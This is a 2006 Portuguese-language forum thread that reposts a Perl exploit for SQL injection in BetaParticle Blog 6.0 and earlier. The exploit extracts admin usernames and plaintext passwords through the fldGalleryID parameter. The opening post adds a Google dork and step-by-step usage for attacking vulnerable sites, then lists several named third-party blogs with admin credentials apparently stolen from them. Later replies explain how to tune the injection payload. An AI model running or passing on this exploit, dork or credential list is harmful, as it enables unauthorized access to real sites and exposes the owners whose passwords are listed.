Post by: thorking on 04 de July , 2006, 03:47:33 AM
# BetaParticle Blog <= 6.0 (fldGalleryID) Remote SQL Injection Exploit
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: www.nukedx.com (http://www.nukedx.com)
#Original advisory: http://www.nukedx.com/?viewdoc=20 (http://www.nukedx.com/?viewdoc=20)
#Usage: beta.pl
#googledork: [ "Powered by bp blog" ] 9.710 pages..
use IO::Socket;
if(@ARGV != 2) { usage(); }
else { exploit(); }
sub header()
{
print "\n- NukedX Security Advisory Nr.2006-20\r\n";
print "- BetaParticle Blog <= 6.0 Remote SQL Injection Vulnerability\r\n";
}
sub usage()
{
header();
print "- Usage: $0
print "-
print "-
exit();
}
sub exploit () {
#Our variables...
$bpserver = $ARGV[0];
$bpserver =~ s/(http:\/\/)//eg;
$bphost = "http://".$bpserver;
$bpdir = $ARGV[1];
$bpport = "80";
$bptar = "template_gallery_detail.asp?fldGalleryID=";
$bpfinal = "main.asp";
$bpxp = "-1+UNION+SELECT+null,fldAuthorUsername,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1";
$bpreq = $bphost.$bpdir.$bptar.$bpxp;
#Sending data...
header();
print "- Trying to connect: $bpserver\r\n";
$bp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$bpserver", PeerPort => "$bpport") || die "- Connection failed...\n";
print $bp "GET $bpreq HTTP/1.1\n";
print $bp "Accept: */*\n";
print $bp "Referer: $bphost\n";
print $bp "Accept-Language: tr\n";
print $bp "User-Agent: NukeZilla 4.3\n";
print $bp "Cache-Control: no-cache\n";
print $bp "Host: $bpserver\n";
print $bp "Connection: close\n\n";
print "- Connected...\r\n";
while ($answer = <$bp>) {
if ($answer =~ /
(.*?)<\/h3>/) {
print "- Exploit succeed! Getting admin's information\r\n";
print "- Username: $1\r\n";
}
if ($answer =~ /
(.*?)<\/p>/) {
print "- Password: $1\r\n";
print "- Lets go $bphost$bpdir$bpfinal for admin login.\r\n";
exit();
}
if ($answer =~ /number of columns/) {
print "- This version of BetaParticle is vulnerable too\r\n";
print "- but default query of SQL-Inj. does not work on it\r\n";
print "- So please edit query by manually adding null data..\r\n";
exit();
}
}
print "- Exploit failed\n"
}
# milw0rm.com [2006-03-18]
*************************************************************
vamos lá :
achar sites vulneraves procure em um site de busca pela string : "Powered by bp blog" com aspas
agora use a seguinte linha de comando :
perl aspblog.pl www.site.com (http://www.site.com) /blog/
obs: observe o espaço entre o site e o /blog/
como motra a figura abaixo:
(//http://www.thorking.kit.net/images/tuto/aspblog.JPEG)
se der certo vai mostrar o usuario e senha, como mostra a figura abaixo:
(//http://www.thorking.kit.net/images/tuto/aspblog2.JPEG)
para vcs praticarem aki vai uns sites abaixo:
http://www.vaho.ws/blog/cat.asp?catID=12 (http://www.vaho.ws/blog/cat.asp?catID=12)
Grapa
Hack3r
www.jgcookhouse.com/blog/ (http://www.jgcookhouse.com/blog/)
cheryl
blue1702
www.thewillardfamily.com/blog/ (http://www.thewillardfamily.com/blog/)
admin
brodi2002
www.smokinokies.net/blog/ (http://www.smokinokies.net/blog/)
admin
password
madger.com /blog_5.0b/
- Username: KBYELOLOLKBYELOLOL-
Password: KBYELOLOLKBYELOLOLKBYELOLOL
www.westman.info (http://www.westman.info) /blog/
- Username: admin
- Password: kingaza
www.interphrase.nl/blog/ (http://www.interphrase.nl/blog/)
admin
joris1
sata
http://www.westman.info/blog/template.a ... name=index (http://www.westman.info/blog/template.asp?pagename=index)
http://www.interphrase.nl/blog/template ... asp?id=113 (http://www.interphrase.nl/blog/template_permalink.asp?id=113)
http://www.jgcookhouse.com/blog/ (http://www.jgcookhouse.com/blog/)
http://www.thewillardfamily.com/blog/ (http://www.thewillardfamily.com/blog/)
nao me responsabilizo!
Post by: Shady on 04 de July , 2006, 03:51:30 AM
Post by: Anonymous on 04 de July , 2006, 03:52:46 AM
Post by: d3rf on 07 de July , 2006, 09:31:50 AM
Keria poder manjar de Perl para entender o código fonte o q faz ... se alguem puder explica-lo, passo a passo, tb vai ser muito útil ...
Post by: Security on 07 de July , 2006, 01:00:35 PM
Post by: Anonymous on 07 de July , 2006, 11:10:09 PM
Usando o exemplo do nosso amigo acontece o seguinte:
perl aspblog.pl www.thewllardfamily.com (http://www.thewllardfamily.com) /blog
o exploit conecta no site, diretório e argumento vulnerável, ficando assim
http://www.thewllardfamily.com/blog/www ... AuthorId=1 (http://www.thewllardfamily.com/blog/wwwtemplate_gallery_detail.asp?fldGalleryID=-1+UNION+SELECT+null,fldAuthorUsername,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1)
Outra coisa deste exploit interessante é o seguinte:
if ($answer =~ /number of columns/) {
print "- This version of BetaParticle is vulnerable too\r\n";
print "- but default query of SQL-Inj. does not work on it\r\n";
print "- So please edit query by manually adding null data..\r\n";
exit();
Isso significa que deu erro no SQL Injection (o que significa que o site é vulnerável, porém este SQL não deu) pois tem mais colunas que o normal, neste caso você deverá adicionar mais nulls no SQL Injection.
Abraços
Post by: Anonymous on 07 de July , 2006, 11:18:39 PM
Estranho a senha não ser guardada em Hash e sim em texto puro...
Abraços
Post by: Anonymous on 09 de July , 2006, 01:15:55 PM
Disse Lembrando que vc não precisa deste password, você mesmo pode conseguir estas coisas no seu navegador.
Quis dizer Lembrando que vc não precisa deste exploit, você mesmo pode conseguir estas coisas no seu navegador.